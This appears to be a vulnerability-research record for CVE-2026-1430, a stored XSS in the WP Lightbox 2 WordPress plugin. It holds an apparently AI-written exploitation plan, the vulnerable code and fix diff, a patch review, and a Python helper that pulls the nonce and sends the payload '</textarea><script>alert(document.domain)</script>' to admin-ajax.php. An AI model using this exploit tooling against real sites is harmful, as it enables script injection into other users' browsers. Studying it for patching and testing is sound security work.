[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fWU6AlDkNk37lLVvecmF3M4uTQzkYjkLr7bwNEmEzWLE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-1430","wp-lightbox-2-authenticated-administrator-stored-cross-site-scripting","WP Lightbox 2 \u003C 3.0.7 - Authenticated (Administrator+) Stored Cross-Site Scripting","The WP Lightbox 2 plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions before 3.0.7 (up to and including 3.0.6.8) due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 
This only affects multi-site installations and installations where unfiltered_html has been disabled.","wp-lightbox-2",null,"\u003C3.0.7","3.0.7","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-30 00:00:00","2026-04-02 14:49:17",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6ce24fa7-b265-4689-94b3-7df62c7074c2?source=api-prod",4,[22,23,24,25,26,27,28,29],"I18n\u002Fhowtouse.html","I18n\u002Fwp-lightbox-2.pot","admin\u002Fadmin_menu.php","admin\u002Fgeneral_settings.php","admin\u002Fscripts\u002Fangular.min.js","admin\u002Fstyles\u002Fadmin_themplate.css","admin\u002Fstyles\u002Fjquery-ui.css","includes\u002Finstall_database.php","researched",false,3,"# Research Plan: Exploitation of CVE-2026-1430 (WP Lightbox 2 Stored XSS)\n\n## 1. Vulnerability Summary\nThe **WP Lightbox 2** plugin (versions \u003C 3.0.7) contains a stored cross-site scripting (XSS) vulnerability in its settings management. The `save_parametrs` function in `admin\u002Fgeneral_settings.php` writes request input straight into the WordPress database via `update_option` without sanitizing it, and the stored value is later echoed without escaping. Exploitation requires an authenticated Administrator, so the issue matters mainly where `unfiltered_html` is disabled (WordPress Multisite, or single sites that have removed the capability): there an administrator who is not allowed to post raw HTML can still store script through this setting, and it executes whenever the stored value is rendered, on the settings page or on front-end pages with the lightbox active.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action**: `save_in_databese_lightbox2`\n- **Vulnerable Parameter**: `jqlb_help_text` (every key in the `get_general_settings` array is stored the same way; this is the free-text one)\n- **Authentication**: Required. The vulnerable handler checks only the nonce, not a capability, but the nonce is issued on the settings page, which needs Administrator privileges (`manage_options`)\n- **Preconditions**: The plugin must be active. 
Exploitation is most relevant when `unfiltered_html` is restricted.\n\n## 3. Code Flow\n1. **Entry Point**: The plugin registers an AJAX handler in `admin\u002Fgeneral_settings.php`:\n   ```php\n   add_action( 'wp_ajax_save_in_databese_lightbox2', array($this, 'save_parametrs') );\n   ```\n2. **Nonce Verification**: The `save_parametrs()` function verifies a nonce passed via `$_POST['wp_lightbox_2_general_settings_page']`. In the vulnerable version this nonce is the only gate; there is no `current_user_can()` check in the handler itself.\n3. **Sink (Storage)**: The function iterates through `$initial_values` (retrieved from `$this->databese_settings`, which contains the `get_general_settings` array defined in `includes\u002Finstall_database.php`).\n   ```php\n   \u002F\u002F admin\u002Fgeneral_settings.php\n   foreach($initial_values as $key => $value){\n       if(isset($_POST[$key])){\n           update_option($key, stripslashes($_POST[$key])); \u002F\u002F VULNERABLE SINK: No sanitization\n       }\n   }\n   ```\n4. **Rendering**: The stored option (`jqlb_help_text` in particular) is read back and echoed without escaping: into the `\u003Ctextarea>` on the settings page, and on front-end pages where the lightbox enqueues its configuration or tooltips.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is generated on the plugin's general settings page.\n\n1. **Identify Page**: The settings page is located at `\u002Fwp-admin\u002Fadmin.php?page=WP-Lightbox-2`.\n2. **Access Page**: Navigate to this URL using the `browser_navigate` tool while logged in as an Administrator.\n3. **Extract Nonce**: The nonce is present in an input field named `wp_lightbox_2_general_settings_page`.\n   - Use `browser_eval`: `document.getElementsByName(\"wp_lightbox_2_general_settings_page\")[0].value`\n\n## 5. Exploitation Strategy\nThe exploit involves sending a crafted AJAX request to save a malicious payload into the `jqlb_help_text` setting.\n\n### Step 1: Collect Required Parameters\nThe `save_parametrs` function iterates over *all* settings keys; any key absent from `$_POST` is skipped, sets `$kk=0` and prints `error saving \u003Ckey>`, so send every key to get a clean success response. 
From `includes\u002Finstall_database.php`, the keys for `get_general_settings` are:\n- `jqlb_overlay_opacity`\n- `jqlb_help_text`\n- `jqlb_margin_size`\n- `jqlb_automate`\n- `jqlb_comments`\n- `jqlb_resize_on_demand`\n- `jqlb_show_download`\n- `jqlb_navbarOnTop`\n- `jqlb_resize_speed`\n\n### Step 2: Send Malicious POST Request\nUse the `http_request` tool to perform the update.\n\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n```text\naction=save_in_databese_lightbox2&\nwp_lightbox_2_general_settings_page=[EXTRACTED_NONCE]&\njqlb_help_text=\u003C\u002Ftextarea>\u003Cscript>alert(document.domain)\u003C\u002Fscript>&\njqlb_overlay_opacity=80&\njqlb_margin_size=0&\njqlb_automate=1&\njqlb_comments=1&\njqlb_resize_on_demand=0&\njqlb_show_download=0&\njqlb_navbarOnTop=0&\njqlb_resize_speed=400\n```\n*(Note: Use URL encoding for the payload).*\n\n## 6. Test Data Setup\n1. **User**: Ensure an Administrator user exists.\n2. **Plugin**: Activate `wp-lightbox-2`.\n3. **Page Content**: Create a public post containing an image link to ensure the lightbox logic triggers on the frontend.\n   ```bash\n   wp post create --post_type=post --post_status=publish --post_title=\"XSS Test\" --post_content='\u003Ca href=\"https:\u002F\u002Fexample.com\u002Ftest.jpg\" rel=\"lightbox\">View Image\u003C\u002Fa>'\n   ```\n\n## 7. Expected Results\n- The AJAX request should return `sax_normala` (the success string defined in `admin\u002Fgeneral_settings.php`).\n- When navigating back to the settings page or viewing a post where the lightbox is active, the script `\u003Cscript>alert(document.domain)\u003C\u002Fscript>` should execute.\n\n## 8. Verification Steps\n1. **Check Database**: Use WP-CLI to confirm the option is stored unsanitized.\n   ```bash\n   wp option get jqlb_help_text\n   ```\n2. 
**Check Response**: Inspect the HTML of the settings page to see if the payload breaks out of the `\u003Ctextarea>` (a raw `\u003Cscript>` in the output means no escaping was applied; `&lt;script&gt;` means it was):\n   ```bash\n   curl -s -b cookies.txt \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=WP-Lightbox-2\" | grep \"jqlb_help_text\"\n   ```\n\n## 9. Alternative Approaches\nIf `jqlb_help_text` is not reflected on the frontend, target other settings from `get_design_settings` if accessible, or check if the plugin supports a shortcode that displays the \"Help Text\". Alternatively, since the vulnerability exists in the `update_option` call, any setting updated by the AJAX action is a candidate if it is echoed elsewhere without escaping.","The WP Lightbox 2 plugin for WordPress is vulnerable to Authenticated Stored Cross-Site Scripting (XSS) due to a lack of input sanitization in its AJAX settings update handler. This allows administrators to store arbitrary HTML and JavaScript in settings such as 'jqlb_help_text'; the payload runs when the settings page is reloaded or when the help text is rendered on the front end. 
This vulnerability is particularly impactful in multi-site installations where 'unfiltered_html' is restricted.","\u002F\u002F admin\u002Fgeneral_settings.php lines 32-42\npublic function save_parametrs(){\n\t $initial_values= $this->databese_settings;\n$kk=1;\n\tif(isset($_POST['wp_lightbox_2_general_settings_page']) && wp_verify_nonce( $_POST['wp_lightbox_2_general_settings_page'],'wp_lightbox_2_general_settings_page')){\n\n\t\tforeach($initial_values as $key => $value){\n\t\t\tif(isset($_POST[$key])){\n\t\t\t\tupdate_option($key,stripslashes($_POST[$key]));\n\t\t\t}\n\t\t\telse{\n\t\t\t\t$kk=0;\n\t\t\t\tprintf('error saving %s \u003Cbr>',$key);\n\t\t\t}\n\t\t}\n\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-lightbox-2\u002F3.0.6.8\u002Fadmin\u002Fgeneral_settings.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-lightbox-2\u002F3.0.7\u002Fadmin\u002Fgeneral_settings.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-lightbox-2\u002F3.0.6.8\u002Fadmin\u002Fgeneral_settings.php\t2025-06-04 19:15:00.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-lightbox-2\u002F3.0.7\u002Fadmin\u002Fgeneral_settings.php\t2026-01-31 17:51:00.000000000 +0000\n@@ -32,12 +32,19 @@\n \tpublic function save_parametrs() {\n \t\t$initial_values = $this->databese_settings;\n \t\t$kk = 1;\n \n+\t\tif ( ! current_user_can( 'manage_options' ) || ! 
wp_doing_ajax() ) {\n+\t\t\tdie('Authorization Problem');\n+\t\t}\n+\n \t\tif ( isset( $_POST['wp_lightbox_2_general_settings_page'] ) && wp_verify_nonce( $_POST['wp_lightbox_2_general_settings_page'], 'wp_lightbox_2_general_settings_page' ) ) {\n \n \t\t\tforeach ( $initial_values as $key => $value ) {\n \t\t\t\tif ( isset( $_POST[ $key ] ) ) {\n-\t\t\t\t\tupdate_option( $key, stripslashes( $_POST[ $key ] ) );\n+\t\t\t\t\tupdate_option( $key, sanitize_text_field( stripslashes( $_POST[ $key ] ) ) );\n \t\t\t\t} else {\n \t\t\t\t\t$kk = 0;\n \n \t\t\t\t\tprintf( 'error saving %s \u003Cbr>', $key );\n@@ -45,7 +52,7 @@\n \t\t\t\t}\n \t\t\t}\n \t\t} else {\n-\t\t\tdie('Authorization Problem ');\n+\t\t\tdie('Authorization Problem');\n \t\t}","The exploit targets the AJAX action 'save_in_databese_lightbox2' used by the plugin to save general settings. An attacker with Administrator privileges first navigates to the plugin's settings page (\u002Fwp-admin\u002Fadmin.php?page=WP-Lightbox-2) to extract a valid CSRF nonce from the 'wp_lightbox_2_general_settings_page' hidden input field. The attacker then sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the action parameter, the nonce, and a malicious payload containing arbitrary HTML\u002FJavaScript inside the 'jqlb_help_text' parameter. Because the plugin uses 'update_option' on the raw POST data (after stripslashes) without sanitization, the payload is saved to the database. 
The script will execute when the settings page is reloaded or when the lightbox help text is rendered on the website's frontend.","gemini-3-flash-preview","2026-04-17 22:22:33","2026-04-17 22:23:05",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.0.6.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-lightbox-2\u002Ftags\u002F3.0.6.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-lightbox-2.3.0.6.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-lightbox-2\u002Ftags\u002F3.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-lightbox-2.3.0.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-lightbox-2\u002Ftags"]
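Review bot: in the first hunk of admin/general_settings.php, `sanitize_text_field( stripslashes( $_POST[ $key ] ) )` is applied uniformly to every key, which closes the stored XSS for `jqlb_help_text` but does not validate the numeric and flag options (`jqlb_overlay_opacity`, `jqlb_margin_size`, `jqlb_resize_speed`, the `0`/`1` switches); a per-key sanitizer such as `absint()` for those would reject non-numeric strings instead of storing them. Two related gaps sit just outside the hunk: values written before the upgrade are not re-sanitized by this change, and the settings page output is not shown being escaped, so the textarea should still print the option through `esc_textarea()` (and attributes through `esc_attr()`) so that an already-stored `</textarea><script>` payload cannot close the element. The new `current_user_can( 'manage_options' ) || ! wp_doing_ajax()` guard is correctly placed before the nonce check; `wp_die()` rather than `die()` would be the idiomatic exit there. The second hunk only trims trailing whitespace in the `die()` string and needs no comment.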
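The nonce acquisition (section 4), request construction (section 5) and settings-page check (section 8) above can be exercised offline with the helper below. It is an added example, not code from the plugin or from the research notes: it assumes only the AJAX action name, nonce field name and `get_general_settings` keys quoted in the plan, and the three sample settings pages it checks against are constructed for the example (one echoing the payload raw as the vulnerable version does, one HTML-escaped, one with the value stripped as 3.0.7's `sanitize_text_field()` leaves it). The `send_settings()` function is the only part that touches the network and is not run by the stand-alone demonstration.

```python
"""Offline helpers for CVE-2026-1430 (WP Lightbox 2 < 3.0.7): nonce extraction,
admin-ajax.php body construction and settings-page verification.
Added example; not the plugin's or the research plan's own code."""
import html
import re
from urllib.parse import urlencode, parse_qs
from urllib.request import Request, urlopen

AJAX_ACTION = "save_in_databese_lightbox2"            # from the research plan
NONCE_FIELD = "wp_lightbox_2_general_settings_page"    # hidden input + nonce action

# Keys of the get_general_settings array (includes/install_database.php).
# save_parametrs() prints "error saving <key>" for every key absent from
# $_POST, so a clean run sends all of them.
SETTINGS_KEYS = (
    "jqlb_overlay_opacity", "jqlb_help_text", "jqlb_margin_size",
    "jqlb_automate", "jqlb_comments", "jqlb_resize_on_demand",
    "jqlb_show_download", "jqlb_navbarOnTop", "jqlb_resize_speed",
)

# Closes the settings-page <textarea> and runs script; the vulnerable
# stripslashes()+update_option() sink stores it verbatim.
PAYLOAD = "</textarea><script>alert(document.domain)</script>"

_ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*"([^"]*)"|([\w-]+)\s*=\s*'([^']*)'""")


def _attrs(tag):
    """Attribute name -> value for one HTML start tag (order-independent)."""
    out = {}
    for dq_name, dq_val, sq_name, sq_val in _ATTR_RE.findall(tag):
        out[(dq_name or sq_name).lower()] = dq_val if dq_name else sq_val
    return out


def extract_nonce(settings_html):
    """Value of the hidden <input name=NONCE_FIELD> on the settings page, or None."""
    for tag in re.findall(r"<input\b[^>]*>", settings_html, re.I):
        a = _attrs(tag)
        if a.get("name") == NONCE_FIELD and a.get("value"):
            return a["value"]
    return None


def default_settings(help_text):
    """Benign values for every key, with the payload in the free-text one."""
    s = {"jqlb_overlay_opacity": "80", "jqlb_margin_size": "0",
         "jqlb_automate": "1", "jqlb_comments": "1",
         "jqlb_resize_on_demand": "0", "jqlb_show_download": "0",
         "jqlb_navbarOnTop": "0", "jqlb_resize_speed": "400"}
    s["jqlb_help_text"] = help_text
    return s


def build_body(nonce, settings):
    """URL-encoded admin-ajax.php body; refuses to build a partial request."""
    missing = [k for k in SETTINGS_KEYS if k not in settings]
    if missing:
        raise ValueError("settings missing keys: " + ", ".join(missing))
    fields = {"action": AJAX_ACTION, NONCE_FIELD: nonce}
    fields.update((k, settings[k]) for k in SETTINGS_KEYS)
    return urlencode(fields)  # urlencode() takes care of the payload's < > /


def decode_body(body):
    """Inverse of build_body(), for checking what a client would send."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def classify_help_text(settings_html, payload=PAYLOAD):
    """How the stored help text comes back on the settings page:
    'raw'         payload present unescaped, so it closes the textarea and
                  the script runs (< 3.0.7 behaviour);
    'escaped'     only an HTML-escaped copy is present (esc_textarea-style
                  output escaping, not exploitable this way);
    'neutralized' neither form is present (3.0.7 strips the markup on save)."""
    if payload in settings_html:
        return "raw"
    if html.escape(payload, quote=False) in settings_html:
        return "escaped"
    return "neutralized"


def send_settings(base_url, cookie_header, nonce, settings, timeout=10):
    """Live helper (network): POST the settings, return the response body.
    Only against an instance you are authorised to test; the plan expects the
    success string 'sax_normala' from save_parametrs()."""
    req = Request(base_url.rstrip("/") + "/wp-admin/admin-ajax.php",
                  data=build_body(nonce, settings).encode(),
                  headers={"Content-Type": "application/x-www-form-urlencoded",
                           "Cookie": cookie_header})
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# Constructed sample pages (not captured from a real install); the hidden
# input deliberately puts value= before name= to show order does not matter.
SAMPLE_NONCE = "a1b2c3d4e5"
_FORM_HEAD = '<form><input type="hidden" value="%s" name="%s">' % (SAMPLE_NONCE, NONCE_FIELD)
_TEXTAREA = '<textarea name="jqlb_help_text">%s</textarea></form>'
PAGE_VULNERABLE = _FORM_HEAD + _TEXTAREA % PAYLOAD
PAGE_ESCAPED = _FORM_HEAD + _TEXTAREA % html.escape(PAYLOAD, quote=False)
PAGE_FIXED = _FORM_HEAD + _TEXTAREA % ""

if __name__ == "__main__":
    nonce = extract_nonce(PAGE_VULNERABLE)
    print("nonce:", nonce)
    print("body:", build_body(nonce, default_settings(PAYLOAD)))
    for name, page in (("vulnerable", PAGE_VULNERABLE), ("escaped", PAGE_ESCAPED), ("fixed", PAGE_FIXED)):
        print(name, "->", classify_help_text(page))
```

Against a live target, `extract_nonce()` takes the HTML of `/wp-admin/admin.php?page=WP-Lightbox-2` fetched with the administrator's cookies, `send_settings()` posts the body, and `classify_help_text()` on a re-fetch of the settings page gives the same three-way verdict the curl-and-grep step in section 8 gives by eye.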